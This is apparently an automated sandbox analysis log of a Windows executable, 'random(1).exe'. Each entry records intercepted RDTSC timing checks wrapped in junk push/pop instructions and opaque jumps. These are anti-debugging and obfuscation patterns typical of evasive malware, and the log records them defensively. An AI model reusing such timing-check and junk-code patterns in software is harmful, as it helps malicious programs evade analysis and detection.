Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8A0 second address: 10EB8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F06D8518546h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8B0 second address: 10EB8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8BC second address: 10EB8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8C2 second address: 10EB8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EFBC7 second address: 10EFBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EFBCB second address: 10EFBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEE5A second address: 10EEE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEFCD second address: 10EEFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEFE7 second address: 10EEFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEFED second address: 10EEFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF169 second address: 10EF16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF2A5 second address: 10EF2CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9DBh 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d jo 00007F06D8B4D9C6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jne 00007F06D8B4D9CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF6E5 second address: 10EF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF6EB second address: 10EF6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF84C second address: 10EF852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF852 second address: 10EF87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F06D8B4D9D3h 0x0000000e jmp 00007F06D8B4D9CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF87B second address: 10EF881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF881 second address: 10EF887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF887 second address: 10EF88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF88B second address: 10EF8AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F06D8B4D9D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10F465B second address: 10F4660 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10F4660 second address: 10F4696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F06D8B4D9D9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FAA6D second address: 10FAA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F06D8518546h 0x0000000b jmp 00007F06D8518559h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FB1BF second address: 10FB1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F06D8B4D9C6h 0x0000000c jp 00007F06D8B4D9C6h 0x00000012 jmp 00007F06D8B4D9D7h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FC591 second address: 10FC5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FA455 second address: 10FA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FA45B second address: 10FA46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jp 00007F06D8518546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11038D0 second address: 11038DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1110AF7 second address: 1110B12 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F06D851855Dh 0x00000008 jmp 00007F06D8518551h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11106AC second address: 11106B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11106B1 second address: 11106C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8518546h 0x0000000a je 00007F06D8518546h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1046E17 second address: 1046E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8B4D9D1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1046E03 second address: 1046E17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F06D8518548h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1113F56 second address: 1113F6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1113F6D second address: 1113F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1113F75 second address: 1113F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111B328 second address: 111B347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518559h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111B347 second address: 111B355 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111B355 second address: 111B35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F057 second address: 111F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F05D second address: 111F076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F06D8518546h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F076 second address: 111F07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F07A second address: 111F07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 112131C second address: 1121328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1121328 second address: 1121337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1131059 second address: 113105F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113105F second address: 1131065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11311B7 second address: 11311DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11311DF second address: 11311EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F06D8518546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11314ED second address: 11314F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11314F1 second address: 11314F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11314F5 second address: 113152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F06D8B4D9D2h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 jns 00007F06D8B4D9C6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113152A second address: 113153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113153C second address: 113154E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F06D8B4D9E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1132194 second address: 1132198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113460C second address: 1134616 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1143BB8 second address: 1143BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F06D8518546h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 115693E second address: 115694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 115694C second address: 1156970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F06D8518559h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1156970 second address: 1156974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1156974 second address: 115697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11564F0 second address: 11564F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11564F4 second address: 115651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518559h 0x00000007 jo 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 115651E second address: 1156527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B074 second address: 116B078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B32A second address: 116B32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B4DD second address: 116B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8518546h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B4E8 second address: 116B501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B987 second address: 116B98B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B98B second address: 116B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BAF7 second address: 116BAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BAFF second address: 116BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b jmp 00007F06D8B4D9D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BB22 second address: 116BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BB28 second address: 116BB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11704A8 second address: 11704F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F06D8518548h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jnp 00007F06D8518546h 0x00000028 push 00000004h 0x0000002a xor dword ptr [ebp+12482B69h], eax 0x00000030 call 00007F06D8518549h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jno 00007F06D8518546h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11704F6 second address: 11704FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11704FC second address: 117052D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F06D8518550h 0x0000000f jnc 00007F06D8518548h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jc 00007F06D8518550h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117052D second address: 117053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117053A second address: 1170541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1170541 second address: 1170571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11707A7 second address: 117082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518553h 0x00000009 popad 0x0000000a jmp 00007F06D8518556h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, dword ptr [ebp+122D1BDBh] 0x00000019 push dword ptr [ebp+1246A6DCh] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F06D8518548h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c call 00007F06D8518549h 0x00000041 pushad 0x00000042 jmp 00007F06D8518556h 0x00000047 push eax 0x00000048 push edx 0x00000049 jns 00007F06D8518546h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117082C second address: 1170867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D5h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jc 00007F06D8B4D9C6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jg 00007F06D8B4D9C6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1170867 second address: 1170871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1170871 second address: 1170875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11739CD second address: 11739EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Ch 0x00000009 jc 00007F06D8518546h 0x0000000f popad 0x00000010 pop edx 0x00000011 jng 00007F06D851855Ah 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11739EE second address: 11739F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11739F4 second address: 11739FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117555F second address: 1175563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70291 second address: 4D70295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70295 second address: 4D70299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70299 second address: 4D7029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7029F second address: 4D702EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D2h 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 movzx ecx, dx 0x0000001b movsx edi, ax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov bl, cl 0x00000024 jmp 00007F06D8B4D9CDh 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edi, ax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D702EC second address: 4D702F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70320 second address: 4D70344 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D9h 0x00000010 rdtsc
